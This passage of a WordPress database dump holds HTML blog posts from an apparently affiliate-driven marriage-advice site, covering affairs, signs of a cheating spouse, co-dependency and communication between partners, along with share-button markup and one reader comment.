tag-infidelity tag-marriage-after-an-affair tag-relationship tag-resentment tag-saving-your-marriage tag-united-states post_box top\" id=\"post-1647\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Can You Overcome An Affair?</h1>\n					<p class=\"headline_meta\"><abbr class=\"published\" title=\"2011-02-02\">February 2, 2011</abbr></p>\n					<p class=\"headline_meta\">in <span><a href=\"../all-articles/affairs/\" title=\"View all posts in Affairs\" rel=\"category tag\">Affairs</a></span></p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>When people are faced with their partner’s infidelity, they want to know why the affair happened. They want to know everything that happened during the affair. </p>\n<p>They want to know why their partner had an affair. They desperately want to know if they will ever be able to trust their partner again. <span id=\"more-1647\"></span></p>\n<p><a href=\"../go/catchcheatingspouse/\"></a></p>\n<p><strong>Here a few sobering facts about affairs.</strong></p>\n<ul><li>About 22 percent of men admit to having an affair at least once.</li>\n<li>About 14 percent of married women admit to having cheated behind their husbands back.</li>\n<li>70 percent of married women and 54 percent of married men did not know of their partner’s affairs.</li>\n<li>17 percent of divorces in the United States are specifically attributed to infidelity</li>\n</ul><p>When you find out about your partner’s infidelity here are some of the feelings you will go through.</p>\n<ul><li>Devastation</li>\n<li>Shock</li>\n<li>Anger</li>\n<li>Anxiety</li>\n<li>Resentment</li>\n<li>Helplessness</li>\n</ul><p><strong>Can You Overcome An affair?</strong></p>\n<p>If you are struggling to come to terms with the affair then right now you might be thinking it’s too late to  but just remember one thing. You aren’t alone in what you are going through. Right now there are many thousands of people feeling the same way that you are feeling. </p>\n<p>They are struggling to cope with the same problems as you. Even though the wounds run deep you can overcome the agony of an affair. Even those on the brink of a divorce can bring back a loving relationship with the right advice. Affairs may be common, but it is a lot easier to overcome them than you might think.</p>\n<p>In fact many people have successfully overcome the problems caused by an affair thanks to <a href=\"../review-of-how-to-survive-an-affair/\">How To Survive An Affair</a>. It is based on thirty years of clinical experience and has helped many people to save their marriage after an affair.  </p>\n<p>Overcoming an affair won’t be easy – it will take some dedication and work from both parties. There is no such thing as a magic wand but if you follow the program in How To Survive An Affair you will have a much better chance of saving your marriage.</p>\n<p><a href=\"../review-of-how-to-survive-an-affair/\">Here’s where you start healing after an affair.</a></p>\n\n<style><![CDATA[\n*{margin:0; padding:0;}\nul{ list-style:none;}\n#socialbuttonnav {width:90%; overflow:hidden;margin:0 auto;}\n#socialbuttonnav li{background:none;overflow:hidden;width:65px; height:80px; line-height:30px; margin-right:2px; float:left; text-align:center;}\n#fb { text-align:center;border:none; }\n#fb iframe {text-align: center;float:left; }\n]]></style><ul id=\"socialbuttonnav\"><li><!-- Twitter--><div><a name=\"twitter_share\" data-count=\"vertical\" href=\"http://twitter.com/share\" class=\"twitter-share-button\" id=\"twitter_share\">Tweet</a></div></li>\n<li><!-- Google plus one--><div><plusone size=\"tall\" count=\"true\"></plusone></div></li>\n<li><!-- stumbleupon--><div></div></li>\n<li><!-- linkedin--><div><script type=\"in/share\" data-counter=\"top\"></script></div></li>\n<li><!-- digg--><div><a class=\"DiggThisButton DiggMedium\" href=\"http://digg.com/submit?url=\"><?php the_permalink(); ??>\"&amp;title=\"<?php the_title(); ??>\"\"&gt;</a></div></li>\n<li><!-- Buzz--><div><a title=\"Post to Google Buzz\" class=\"google-buzz-button\" href=\"http://www.google.com/buzz/post\" data-button-style=\"normal-count\"></a></div></li>\n<li><!-- Facebook like--><div id=\"fb-root\"></div><script src=\"../en_US/all.js\"></script><like href=\"\" send=\"false\" layout=\"box_count\" width=\"64\" show_faces=\"false\" action=\"like\" font=\"\"></like></li>\n</ul><p class=\"post_tags\">Tagged as:\n						<a href=\"../tag/affair/\" rel=\"tag nofollow\">affair</a>, \n						<a href=\"../tag/anger/\" rel=\"tag nofollow\">Anger</a>, \n						<a href=\"../tag/anxiety/\" rel=\"tag nofollow\">anxiety</a>, \n						<a href=\"../tag/how-to-survive-an-affair/\" rel=\"tag nofollow\">How To Survive An Affair</a>, \n						<a href=\"../tag/infidelity/\" rel=\"tag nofollow\">Infidelity</a>, \n						<a href=\"../tag/marriage-after-an-affair/\" rel=\"tag nofollow\">Marriage After An Affair</a>, \n						<a href=\"../tag/relationship/\" rel=\"tag nofollow\">relationship</a>, \n						<a href=\"../tag/resentment/\" rel=\"tag nofollow\">Resentment</a>, \n						<a href=\"../tag/saving-your-marriage/\" rel=\"tag nofollow\">Saving Your Marriage</a>, \n						<a href=\"/\" rel=\"tag nofollow\">United States</a>\n					</p>\n<h3>You may like to read these articles too...</h3><p><a href=\"../why-do-men-have-affairs/\" rel=\"bookmark\" title=\"Permanent Link: Why Do Men Have Affairs?\">Why Do Men Have Affairs?</a></p><p><a href=\"../recovering-from-an-affair/\" rel=\"bookmark\" title=\"Permanent Link: Recovering From an Affair\">Recovering From an Affair</a></p><p><a href=\"../the-three-symptoms-of-affair-withdrawal/\" rel=\"bookmark\" title=\"Permanent Link: The Three Symptoms of Affair Withdrawal\">The Three Symptoms of Affair Withdrawal</a></p><p><a href=\"../how-do-you-get-over-an-affair-and-save-the-marriage/\" rel=\"bookmark\" title=\"Permanent Link: How Do You Get Over An Affair And Save The Marriage?\">How Do You Get Over An Affair And Save The Marriage?</a></p><p><a href=\"../review-of-how-to-survive-an-affair/\" rel=\"bookmark\" title=\"Permanent Link: How to Survive an Affair – Review\">How to Survive an Affair – Review</a></p>				</div>\n			</div>\n\n  \n 			<div id=\"comments\">\n				<div id=\"comments_intro\" class=\"comments_intro\">\n					<p><span class=\"bracket\">{</span> <span>1</span> comment <span class=\"bracket\">}</span></p>\n				</div>\n\n				<dl id=\"comment_list\"><dt class=\"comment even thread-even depth-1\" id=\"comment-2883\">\n<span class=\"avatar\"></span>\n<span class=\"comment_author\">mandy tack</span>\n<span class=\"comment_time\"><a href=\"#comment-2883\" title=\"Permalink to this comment\" rel=\"nofollow\">June 26, 2011 at 4:38 am</a></span>\n\n					</dt>\n					<dd class=\"comment even thread-even depth-1\">\n<div class=\"format_text\" id=\"comment-body-2883\">\n<p>my husband had an affair while we were engagaed. i didnt find out til after we were married (a week) . he was always loving and would always ask me if i loved him??? he is vey insecure with himself and says he was scared of how strong of a women i was as far of my( independence). but yet always told me thats what attracted him to me. always told me how sexy i was but yet had an affair with someone who was not very attractive?? i dont understand any of this. im not feeling real attactive now at all and cant find a way to get images out of my head ( to be intimate with him)….i love him and dont want to end our marriage. it WAS the fairytale i always dreamed. how do we get that back????? how do i respect him again??? how do become intimate with him again???</p>\n<p class=\"reply\"></p>\n</div>\n					</dd>\n				</dl><div class=\"comments_closed\">\n	\n</div>\n			</div>\n					<div class=\"prev_next post_nav\">\n						<p class=\"previous\">Previous post: <a href=\"../is-your-sex-life-boring-and-predictable/\" rel=\"prev\">Is Your Sex Life Boring and Predictable?</a></p>\n						<p>Next post: <a href=\"../if-your-husband-has-been-having-an-affair/\" rel=\"next\">If Your Husband Has Been Having An Affair</a></p>\n					</div>\n		</div>','Overcome An Affair','When people are faced with their partner\'s infidelity, they want to know why the affair happened. They want to know everything that happened during the aff','publish','open','open','','overcome-an-affair','','','2017-10-04 09:07:08','2017-10-04 09:07:08','',0,'http://www.bournesociety.org.uk/overcome-an-affair',0,'post','',0),(49,1,'2017-10-04 09:18:22','2017-10-04 09:18:22','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1306 post type-post status-publish format-standard hentry category-marriage tag-counselor tag-feelings tag-help tag-make tag-marriage-divorce tag-marriage-problems tag-relationship tag-usa post_box top\" id=\"post-1306\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Can You Save a Marriage When It Seems Impossible?</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>You may be asking yourself is there any way to <em>save a marriage</em> when it has hit rock bottom? Is there any possibility of saving a marriage when it seems no hope is left?</p>\n<p>Well, the good news is that saving a marriage from divorce is quite possible if you are prepared to try. And if you succeed, then it’s almost certain that you and your spouse will have an even closer relationship than ever before. So when you ask if there is any way to <span style=\"text-decoration: underline;\">save a marriage</span> I would give a definite “Yes!”</p>\n<p><span id=\"more-1306\"></span></p>\n<h2><em><strong>Will giving your marriage a second chance work?</strong></em></h2>\n<p>A survey was conducted in the USA on hundreds of people who considered their marriage as “unhappy.” The results of the survey discovered that couples who agreed to delay their plans to divorce and give their marriage another chance rated their marriage as “happy” a few years later. So it just goes to prove that if you try hard enough you can put an end to your marriage problems and be happy once again.</p>\n<h2><em><strong>Where did the love go?</strong></em></h2>\n<p>No matter how big the problems are in a marriage, most spouses still have a lingering trace of care and concern for their partner. This is not surprising because you probably married them in the first place because you had a lot of love and respect for them, didn’t you?</p>\n<p>Sometimes your spouse will have changed for the worse over the years, developing attitudes and personality traits that make them seem less attractive as a person than when you were first married. However, if you can recall how they used to be, and all the good things that first attracted you to him or her, there is a good chance of rekindling all the feelings you once had.</p>\n<h2><em><strong>Can you save a marriage by yourself though?</strong></em></h2>\n<p>One of the most misguided beliefs about saving a marriage is that both partners have to be willing to save it. Although it’s true that both partners have to renounce any thoughts of divorce eventually, one spouse can still do something on their own to turn things around. This will give the marriage a little breathing space whilst the other reconsiders.</p>\n<p>The rationale is that if you alter your attitudes towards your spouse, it might encourage them to change their behavior, creating a less tense atmosphere.</p>\n<h2><em><strong>Get sound marriage advice.</strong></em></h2>\n<p>One of the problems of trying to  on your own is that you might be too emotionally involved to make sound decisions. This might cause you to go over the top and do things you shouldn’t do. Taking advice from an informed, impartial intermediary is so important. Seeing a marriage counselor is the most obvious choice but sometimes one partner will refuse to take part, which makes it more difficult.</p>\n<p>If you can’t get your spouse to participate then you will have to attempt it on your own – but you will need practical advice on how to save the marriage. You can find lots of good advice in <a href=\"/\">marriage books</a> and courses that have helped many to save a marriage.</p>\n<h2><em><strong>What if only one of you wants to save the marriage?</strong></em></h2>\n<p>Some of the advice in them has worked even when only one spouse wanted to save the marriage. Even if you are the only one trying to keep your marriage together, it is still possible to turn things round by making some changes in your own behavior.</p>\n<p>Of course, if your partner is willing to try too, it will improve your chances dramatically.</p>\n<p>So, if you feel that there is still a chance to  then it’s time to start doing something positive about it.</p>\n<p>Don’t just sit back waiting for things to happen. Now is the time for you to take action if you want to <a title=\"save the marriage review\" href=\"../save-the-marriage-review/\"></a>.</p>					<p class=\"post_tags\"> </p></div>\n			</div>\n		</div>','How can you save a marriage when it seems impossible?','You may be asking yourself is there any way to save a marriage when it has hit rock bottom? Is there any possibility of saving a marriage when it seems no hope is left?','publish','open','open','','save-a-marriage-when-it-seems-impossible','','','2017-10-04 09:48:00','2017-10-04 09:48:00','',0,'http://www.bournesociety.org.uk/save-a-marriage-when-it-seems-impossible',0,'post','',0),(50,1,'2017-10-04 09:17:09','2017-10-04 09:17:09','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-2566 post type-post status-publish format-standard hentry category-affairs post_box top\" id=\"post-2566\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Catch A Cheating Spouse Tips</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>A <strong>cheating spouse</strong> will always be a painful discovery and is something that cannot be tackled easily.  The question arises in your mind “How can I find out if my husband or wife is cheating on me or even a boyfriend or a girlfriend, for that matter?”<span id=\"more-2566\"></span></p>\n<h3><em><strong>Do You Have Too Much Trust?</strong></em></h3>\n<p>One main advantage that a cheating spouse has is the trust factor.  When you have built a trusting relationship with your spouse, it is often very difficult to detect infidelity since you trust your spouse and are secure and comfortable and would not even want to think about your spouse lying, let alone cheating on you.</p>\n<h3><em><strong>Signs Of Cheating Spouse Are Always There</strong></em></h3>\n<p>Be warned, however, that signs of infidelity are always there, right under your nose, and it is only a question of how well you keep your eyes, ears open to look out for those warning signals.  Another problem you will face is that once you are suspicious of something, you tend to bring it out in the open which may only help your <em>cheating spouse</em> to adjust his or her behaviour and carry on the cheating in a more effective manner, so as not to be caught.</p>\n<p>So, basically, trust and suspicion that is confronted can work favourably for your spouse, so before asking any questions, collect definite proof of cheating before seeking answers.</p>\n<p>Of course, constant surveillance and careful observation is necessitated for discovering your <span style=\"text-decoration: underline;\">cheating spouse</span>, which may be unethical perhaps, but there is really no alternative here.  There is no other effective method to track down your cheating spouse apart from looking for warning signs and collect some proof of infidelity.</p>\n<h3><em><strong>Some tips about a cheating wife could be:</strong></em></h3>\n<p>•    Finding birth control pills in her medicine cabinet when you have undergone a vasectomy<br />\n•    Your wife has a new email ID without your knowledge<br />\n•    She goes to shop for groceries and returns hours later<br />\n•    Sets up a new cell phone account which is billed to her account<br />\n•    Buys some new clothes<br />\n•    Does not confide or share anything with you any more<br />\n•    Removes the wedding ring</p>\n<h3><em><strong>Some tips about a cheating husband could be:</strong></em></h3>\n<p>•    You find condoms in his pockets when you are already on the pill<br />\n•    You find hairs on his car seat<br />\n•    Children’s items become a nuisance for him in the car<br />\n•    Evidence of a scratch or bruise on his neck or face<br />\n•    He works overtime which is not displayed in the pay stub<br />\n•    Perfume smell in his clothes<br />\n•    Not eating well at mealtimes because he already had his at his mistresses’ home<br />\n•    Signs of lipstick on his dress<br />\n•    Tries out new ways of lovemaking</p>\n<p>Apart from the above, some general warning signals that apply to both a cheating wife or cheating husband would be…</p>\n<p>A sudden reduction in the amount of money deposited in your bank account, uncomfortable friends who would not want to let him or her down, your spouse is touchy and is not comfortable in your presence, intimate clothing found that was not given or bought by you, hanging up of the phone when you pick it up, deleting the incoming calls from the ID, deleting emails too, deliberately picks out a fight with you to get out of the house, whispers on the phone and hangs up suddenly when you arrive in the room etc.</p>\n<h2 style=\"&quot;text-align:\" center=\"\"><em><strong>Reasons  For A Cheating Spouse<br /></strong></em></h2>\n<p><strong>Cheating spouses</strong> have their own reasons for doing so, for instance an unhappy relationship that lacks passion, warmth or love and a lack of appreciation from the other, but it does not necessarily justify their behaviour.  Differences have to be logically reasoned and the partners should take the time out to sit down and discuss the issues confronting them rather than resorting to extra marital affairs, which can only cause a lot of pain and turmoil to the other partner.</p>\n<p>Discussing things in a mature manner, being a patient listener and trying to understand the other’s point of view can all be very helpful in bringing the issue to the fore and taking suitable actions immediately rather than let things go as they are and resort to unethical means like cheating on your spouse.</p>\n<p>Of course, there are many online sites that offer computer software and spy devices and there are also many ebooks and guides that offer help in detecting a <span style=\"text-decoration: underline;\">cheating spouse</span>, but the success of these varies from person to person and depending on your own commonsense judgments is always better.</p>\n<p>So, go ahead and speak out with your spouse and sort out your differences and avoid cheating on your spouse at all costs, as this can ruin your marriage!</p><h3> </h3></div>\n			</div>\n		</div>','Catch A Cheating Spouse Tips','A cheating spouse will always be a painful discovery.  The question arises in your mind “How can I find out if my husband or wife is cheating on me?”','publish','open','open','','catch-a-cheating-spouse-tips','','','2017-10-04 09:48:59','2017-10-04 09:48:59','',0,'http://www.bournesociety.org.uk/catch-a-cheating-spouse-tips',0,'post','',0),(51,1,'2017-10-04 09:17:24','2017-10-04 09:17:24','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-46 post type-post status-publish format-standard hentry category-affairs tag-affair tag-cheating-husband tag-cheating-spouses tag-cheating-wife tag-infidelity tag-married-couples tag-mistrust tag-relationship tag-romance post_box top\" id=\"post-46\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Cheating Spouses Can’t Hide Their Extramarital Affairs From The Truth				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>We all lie. A world without little white lies would be uncivilized. But 99% of us have told bigger lies in our lifespan. For most of us, lies told in our personal life makes us feel bad. However, we still continue to lie and cheat.<span id=\"more-46\"></span></p>\n<p>Few events cause as much turmoil in a marriage as infidelity, which can reduce a marriage to rubble, shatter trust and create a breeding ground for insecurity, mistrust and resentment. Most of us have witnessed affairs among people we know, and some of us even have had affairs ourselves. This kind of thing happens in the real world, and it happens all the time. One third of all married couples admit to having cheated on their mates. Let’s not be naïve. That’s quite a large number of people taking risks!<br /><br /></p>\n<p>Affairs begin with two people who find each other interesting and attractive. For whatever reason, the relationship escalates into romance and, finally, into sexual intimacy. People who seek romance and sexual intimacy outside of their primary relationship feel that their relationship is missing something, so they go out and they seek it from someone else.</p>\n<p>If you feel deep in your heart, that your spouse is lying and being unfaithful to you, here are some ways to be sure. One of the techniques professionals use to tell who is lying, and who is telling the truth is to follow eye movements. Neuro-Linguistic Programming says that when people are constructing imaginary or fantasy images we look up and to the left if we are right-handed and up and to the right if we are left-handed. Think, “What color is my Mom’s hair?” Where did your eyes go? Now think, “I’m an astronaut and when I went to the moon I made a snow-man out of moon dust.” Where did your eyes go this time?</p>\n<p>In the book, Telling Lies by lie-catcher Paul Ekman, he presents his ‘facial action coding system.’ These are the facial expressions we all use that are hard-wired to the brain and will show up without our conscious control. Charles Bond, a psychologist at Texas Christian University reported that among 2,520 adults surveyed in 6.3 countries, more than 70% believe that liars tend to avert their gazes and/or stutter, touch, or scratch themselves or tell longer stories than usual.</p>\n<p>If you’re spouse is working too many late nights, think about this next time you ask them what their plans are for the night.</p>\n<p>Although, there has been some research lately that says this analysis is too simplistic to be counted upon, detectives continue to use it along with other tools. There was a story in Outside Magazine about a detective involved in an investigation of a poaching in a national park. He claimed he could tell within one minute if someone was lying. I got very excited and tracked him down to a sub-station in Wyoming. He said that he teaches his skills to trainees in one hour but he wouldn’t tell me what they were. Maybe he thought I was a secret poacher (which is hard to be in Santa Barbara)</p>\n<h3>Here are some other ways to tell if your partner or spouse is lying and having an extramarital affair:</h3>\n<p>1. If their answer to your question is brief, clear, and direct, that is a good sign that it is true.</p>\n<p>2. Liars start to elaborate and repeat themselves and sometimes their story or the details change.</p>\n<p>3. The more a liar tries, the more you need to worry.</p>\n<p>An extramarital affair takes a great deal of energy. The lying, sneaking around, and destroying of evidence all take tremendous amounts of energy. The onset of guilty feelings about having the affair, in the first place, further zaps whatever energy the partner having the affair might still have left. And, guess what all this used energy is a complete waste, because liars cannot control the ‘leakage’ of their true feelings, which run in micro-expressions that last half a second. It is so ordinary, so much a part of our everyday lives and everyday conversations that we hardly notice it.</p>\n<p>Wendy Allen, PhD, president of Wendy Allen PhD Coaching is an expert on marriage and infidelity. She will help you move through the normal but mind-blowing phases of discovery, betrayal, and loss. You can’t go back to how things were, but you can move forward and capture the good moments in life again.</p>\n<p>  </p>\n			  </div>\n			</div>\n		</div>','Cheating Spouses Can’t Hide Their Extramarital Affairs From Us','We all lie. A world without little white lies would be uncivilized. But 99% of us have told bigger lies in our lifespan. For most of us, lies told in our p','publish','open','open','','cheating-spouses-cant-hide-their-extramarital-affairs-from-the-truth','','','2017-10-04 09:48:51','2017-10-04 09:48:51','',0,'http://www.bournesociety.org.uk/cheating-spouses-cant-hide-their-extramarital-affairs-from-the-truth',0,'post','',0),(52,1,'2017-10-04 09:18:22','2017-10-04 09:18:22','<div id=\"content\" class=\"hfeed\">\r\n\r\n<div id=\"fb-root\"></div>\r\n					<script type=\"text/javascript\"><![CDATA[\r\n						window.fbAsyncInit = function()\r\n						{\r\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\r\n						};\r\n						(function()\r\n						{\r\n							var e = document.createElement(\'script\'); e.async = true;\r\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\r\n							document.getElementById(\'fb-root\').appendChild(e);\r\n						}());\r\n					]]></script><div class=\"post-167 post type-post status-publish format-standard hentry category-marriage tag-co-dependency tag-confidence tag-equality tag-interdependence tag-marriage post_box top\" id=\"post-167\">\r\n				<div class=\"headline_area\">\r\n					<h1 class=\"entry-title\">Co-dependent marriages are not healthy</h1>\r\n					<p class=\"headline_meta\">  </p>\r\n				</div>\r\n				<div class=\"format_text entry-content\">\r\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/co-dependent-marriages-are-not-healthy/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&style=normal&hashtags=Co+Dependency,Confidence,Equality,Interdependence,Marriage&b=2\" href=\"../co-dependent-marriages-are-not-healthy/\"></a></div>\r\n<p>Co-dependent marriages are the most abusive form of marriages. They are based on need, but are not healthy. Each partner in the marriage tries to take advantage of his or her hold on the other partner. This can often deteriorate into the sort of marriage where the two partners can neither live together nor live apart. <span id=\"more-167\"></span></p>\r\n<p>This marriage is most unlike the-we-need-each-other marriage, which is healthy. There, the partnership is based on equality, and not on one partner\'s extreme needs. For instance, a woman looking after a drug addict may delude herself into believing that the addict cannot live without her support. The addict too psyches himself into believing that he cannot live without his partner. He therefore starts inflicting miseries on his partner, which she happily suffers – in the belief that this is the only way to keep the addict happy. In truth, of course, the addicts only way to happiness is to receive outside help. This may start off with having a drug test from a company similar to <a href=\"https://www.health-street.net/location/louisville-ky-drug-testing/\">Health Street</a> before going onto a rehabilitation centre. </p>\r\n<p>Such a marriage often results from an unexpected or traumatic experience that jars the normal growth of an individual. Such an event or happening may be the death of a parent, breakup of a family or severe illness. Young girls and boys, who go through this experience, often build extreme marriages. </p>\r\n<p>They need not be blamed. We are born dependent and needy. The child is dependent on the mother for nurturing and being looked after. Later, the child becomes dependent on the parents for needs such as education and entertainment. Simultaneously, the child becomes confident, and gets ready to take independent decisions. Often this independence leads to interdependence. As per needs and convenience, the child who has become an adult switches between independence and interdependence.</p>\r\n<p>However, sometimes independence creeps into co-dependence. This is where adults need to be aware, and stop the marriage from sliding into co-dependency. The individual needs the confidence to become independent, to stand on his own feet. There is no harm in encouraging inter-dependence, but co-dependence in a marriage must be avoided at all costs.</p>\r\n<p>  </p></div>\r\n								</div>\r\n		</div>','Co-dependent marriages - are they healthy?','','publish','open','open','','co-dependent-marriages-are-not-healthy-save-your-marriage','','','2017-10-04 09:48:12','2017-10-04 09:48:12','',0,'http://www.bournesociety.org.uk/co-dependent-marriages-are-not-healthy-save-your-marriage',0,'post','',0),(53,1,'2017-10-04 09:18:22','2017-10-04 09:18:22','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-133 post type-post status-publish format-standard hentry category-marriage tag-communication tag-conflict tag-feelings tag-relationship post_box top\" id=\"post-133\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Communication Breakdown				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>It happens to the best of us. <a title=\"Communication in a relationship\" href=\"../communication-listening-from-love/\">Communication in a relationship</a> is such a fickle thing, and the lines of communication can become blurred every so often, especially when feelings are involved. Even those who think that they are immune to the confusion of conflict can find themselves drawn into a communication breakdown when they least expect it, and chaos ensues.<span id=\"more-133\"></span></p>\n<p>This happened to me on the weekend, and until to be quite honest, it took me by surprise. Even those of us who are better equipped than many others are not immune. My partner told me something that really hurt my feelings, and I lashed back in defense. It was a silly argument, over something as simple as a misplaced bottle of aftershave. But to me, it represented something much deeper, that had been simmering away for a couple of weeks. I get frustrated at having to search for something when it is not where I expect it to be. Worse still when my partner has shifted it and I don’t know the first place to begin searching.</p>\n<p>Aftershave, needles and thread, car keys, a Tupperware container to store my baking soda in, covers for our outdoor chairs, all were examples of instances where I had to turn the house upside-down. A simple answer from my partner when these things were shifted would have saved me a lot of time and frustration. And the answer I got? “You need to open your eyes and organize yourself better”</p>\n<p>I was gutted. When I come home from work I exercise the dog and cook dinner so that it is on the table by the time my partner gets home. The house is always spotless and warm, as I’m very conscious of coming home to a tidy environment. I see this as a fundamental part of my role in coming home first, and it takes a lot of my time. To imply that I have the time to “organize yourself better” really hurt.</p>\n<p>I don’t expect praise, but I did hope that my efforts were recognized. I got told that “I don’t expect you to cook my dinner every night” was interpreted by me as ingratitude, and hurt me even more.</p>\n<p>So where to from here? My partner felt guilty at coming home every night to the perfect household, whereas I felt guilty if it wasn’t perfect. It was never about me trying to make him feel guilty, but it seems it did. And this is where the communication fell down. He misinterpreted my efforts, and I misinterpreted his response.</p>\n<p>Communication, communication, communication. I need for my partner to keep me informed of where things move to. I need to be informed. I need to voice my frustration before it gets to boiling point. We both need to talk about our feelings more, and how each of our contributions to our home and our relationship make us feel, and how we interpret each others contributions. It is not a competition, but for many couples it feels like it.</p>\n<p>When people feel guilt or stress, it leads them to act funny ways. Often stress and guilt are barriers to communication. The key to overcoming them is to recognize what it is, and have the courage to talk about it. You might be able to do it as a couple, or you might want the help of a friend who can listen to the way you are communicating with each other and offer insights and advice.</p>\n<p>We got it sorted out, and kissed and hugged. It wouldn’t hurt so much if I didn’t feel such love at the same time. But it served as a good reminder to me. Sometimes you get so wrapped up in your own emotions that you forget to think of the other person. You also need to entertain the possibility that you are misinterpreting each other. Talking about it is the way to expose the miscommunication and let the healing begin.</p>\n<p>A good lesson to learn, even for the experts…</p>\n<p>This article is brought to you by Save My Marriage Today.</p>\n<p>You may be   making mistakes that will jeopardize your marriage recovery! My <em><em><a rel=\"nofollow\" href=\"/\">Save My Marriage Today</a> </em></em>course has helped save thousands of marriages and is guaranteed   to deliver results or your money back.</p>\n<p>You can’t   afford to give your marriage 50%. You need 100% – you need the BEST information   now! You<em><em> have </em></em>to learn what   it takes to . Get the whole package that gives you REAL   results … <strong><strong><em>guaranteed.</em></strong></strong></p>\n<p>  </p>\n			  </div>\n			</div>\n		</div>','The effects of a communication breakdown','It happens to the best of us. Communication in a relationship is such a fickle thing, and the lines of communication can become blurred every so often, esp','publish','open','open','','communication-breakdown-in-a-marriage','','','2017-10-04 09:48:25','2017-10-04 09:48:25','',0,'http://www.bournesociety.org.uk/communication-breakdown-in-a-marriage',0,'post','',0),(54,1,'2019-01-04 09:18:18','2019-01-04 09:18:18','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-140\" class=\"post-140 post type-post status-publish format-standard hentry category-marriage tag-communication tag-heart tag-love tag-relationship post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Communication In A Relationship</h1>\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n<div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"></div>\r\nListening with interest to what your partner is saying is one of the elements that we think is important in a relationship. It helps us feel respected, honored, important and even cherished. Ignoring what they are saying shows a lack of respect and it says a lot about the state of a relationship. If you love someone you should listen to them with undivided attention and interest, which is listening from love. <span id=\"more-140\"></span>\r\n\r\n<em><strong>So, what is <a href=\"https://the20minuteguide.com/parents/helping-with-words/listening/\" target=\"_blank\" rel=\"noopener\">“listening from love?”</a></strong></em>\r\n\r\n“Listening from love” is listening with total attention to someone and with the intention of creating a deeper connection and to truly understand them.\r\n<blockquote class=\"right\">When you do speak, take the time and have the courage to speak your truth.</blockquote>\r\nVery often people think that if they truly listen with the intention to understand someone that they have agree with them. <strong>We think, this is not the case</strong>.\r\n\r\nListen from love is not judging. It’s listening – truly listening to someone and suspending our fear, doubt, judgment and other defense mechanisms that prevent us from creating deeper connections of the heart. <a href=\"http://www.bournesociety.org.uk/contact\">Get in touch with us</a>.\r\n\r\n<em>Not communicating properly in a relationship can be a cause of the breakdown of your marriage. <a href=\"http://www.bournesociety.org.uk/communication-breakdown-in-a-marriage\">Click here</a>.</em>\r\n<h2>One common complaint between partners is “you never listen to me.”</h2>\r\nThis was true for one couple that we know. What we found is that he was listening but he was too fearful to say what he was really thinking. As a result, his wife thought he was agreeing with her all along but in reality he had simply withdrawn emotionally. There was no conscious agreement between them because fear prevented him from revealing his true feelings. In this case, the real issue was not his lack of listening but rather his not feeling enough safety and trust in the relationship to be honest. <a href=\"http://www.bournesociety.org.uk/communication-problems-is-silence-really-golden\">How to communicate</a>.\r\n<h2>So, in order to “listen from love” more often here’s what we recommend…</h2>\r\n<ul>\r\n 	<li>Whether you’re listening to someone on the phone or in person, give them your undivided attention. If you don’t have time to listen at that moment, arrange a time when you can truly listen and be fully present. This is a time to forget “multi-tasking”. <a href=\"https://www.relate.org.uk/relationship-help/help-relationships/communication/4-communication-habits-avoid-your-relationship\" target=\"_blank\" rel=\"noopener\">See habits to avoid</a>.</li>\r\n 	<li>Stay in the present moment when you are listening. Don’t let your mind drift into thinking about things that happened in the past or what may happen in the future.</li>\r\n 	<li>Make agreements with the people who are closest to you that you will honor each other by listening when the other speaks. When you make and keep conscious agreements like this one a feeling of safety and trust grows between. <a href=\"https://www.psychologytoday.com/gb/blog/evolution-the-self/201009/can-you-and-your-partner-agree-disagree\" target=\"_blank\" rel=\"noopener\">Find out more</a>.\r\nyou.</li>\r\n 	<li>Telephone psychic calls can give you an insight to the direction of your relationship. <a href=\"https://www.clairvoyant.co/trusted-telephone-psychic-readings/psychic-preparation\" target=\"_blank\" rel=\"noopener\">Prepare for your reading</a>.</li>\r\n 	<li>Make a conscious effort to <a href=\"https://www.quickanddirtytips.com/health-fitness/mental-health/how-to-stop-getting-defensive\" target=\"_blank\" rel=\"noopener\">avoid reacting defensively</a>, even in your mind, if this is your pattern.</li>\r\n 	<li>When you do speak, take the time and have the courage to speak your truth.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>','Top 10 tips to communicating in your relationship','','publish','open','open','','how-to-communicate-in-a-relationship','','','2019-01-14 12:05:23','2019-01-14 12:05:23','',0,'http://www.bournesociety.org.uk/how-to-communicate-in-a-relationship',0,'post','',0),(55,1,'2017-10-04 09:21:06','2017-10-04 09:21:06','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-139 post type-post status-publish format-standard hentry category-marriage tag-communication tag-communication-problems tag-divorce tag-heart tag-otto-collins tag-passion tag-relationship post_box top\" id=\"post-139\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Communication Problems – Is Silence really Golden?</h1>\n					<p class=\"headline_meta\"> </p>\n		